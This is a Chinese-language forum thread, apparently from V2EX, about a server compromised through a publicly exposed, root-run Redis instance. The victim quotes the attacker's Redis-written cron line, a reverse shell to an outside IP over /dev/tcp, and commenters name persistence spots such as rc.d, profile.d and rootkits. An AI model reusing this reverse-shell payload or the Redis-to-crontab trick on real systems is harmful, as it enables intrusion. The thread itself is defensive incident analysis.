服务器被入侵了，有懂的老铁帮忙看下，万分感谢

感觉肯定是 redis 被黑 redis 暴露公网被黑的太多了 光是 V2EX 上就看到好几起了

我之前 就是 redis 对外开放被黑过，当时不懂，找腾讯云提工单帮我查，定位到了是这个问题导致的。

redis 暴露公网端口一定得加密码，以普通用户启动，前一阵就被 redis 那个提权漏洞搞过

@opengps #3 神奇的是，8888 打开的是 OwnCloud，是个私人云盘......

iptables INPUT 默认策略不该是 DROP 吗?

妈呀，备案信息里什么都有啊。。。。我觉得楼主可以直接跟对方联系一下，备份服务器以后可以威胁报警了，哈哈哈哈。

你们都慢点动手啊！！！！！！！给我留点时间！！

一直不理解，redis 有什么必要暴露到公网？？？

有备案信息，备份好服务器直接报个警？

@bigbigeggs 附议 14 楼观点 别查了 查不清楚。简单点会隐藏在 系统启动项 /etc/rc*.d bash 启动项 /etc/profile.d 高级点 上 rootkit 或者改掉你的 libc.so 或者 改掉你的 curl wget 等常用二进制 还有很多骚操作 排查不清。重装吧。

脚本小子，这你不报警抓他，一抓一个准，做好取证，警察叔叔过年都冲业绩呢！

"\n* * * * *"大佬们，这个是多久执行一次，被`\n*`给搞懵了

报警不是美滋滋

这人还是个搞网络安全的 github blog 备案都有 也太不小心了

@opengps 可能那个网站也被黑了 成肉鸡了

名字，扣扣，IP 都有了，保留好证据直接报警吧，这手法还搞网安呢也是没谁了。。。

你的 redis 是 root 用户吧

感谢各位大佬的帮助以及建议，昨晚排查到快一点，今天早上又看了看，基本搞懂了。

首先攻击者拿到了我的 redis 端口和密码(全暴露在了公网，具体还不清楚怎么搞到的)

然后往 redis 里面写了一条数据，set x "\n* * * * * bash -i >& /dev/tcp/123.56.128.98/8888 0>&1\n"

然后利用 redis 的 conf 命令 见 RDB 文件的地址替换成了 crontab 的地址 ，日志如下：


然后他的这条 bash 命令就写进了 cron 定时任务里面去了。

查了查定时任务的日志，大概在 12.9 日已经入侵了，但不知道入侵者的目的。


至今位置，cpu, 内存都一切正常，数据也没有丢失。但是应该数据库，redis，zk 等密码他全部获取到了。

写到了环境变量里面去了，唉。

晚上准备收集一下他的资料，准备和他谈谈，再次感谢各位大佬的帮助了。

可以参考如下两篇文章，写的很详细：

redis 入侵： https://www.cnblogs.com/evan-blog/p/10707087.html

反弹 shell： https://www.cnblogs.com/bonelee/p/11021996.html

@beichenhpy 是的，root 用户。已经肯定了是从 redis 入侵的，修改了 dump 文件目录

@k8ser @ztxcccc 感觉报警有点麻烦，晚上研究下他的网址。看看能不能联系上，聊一下。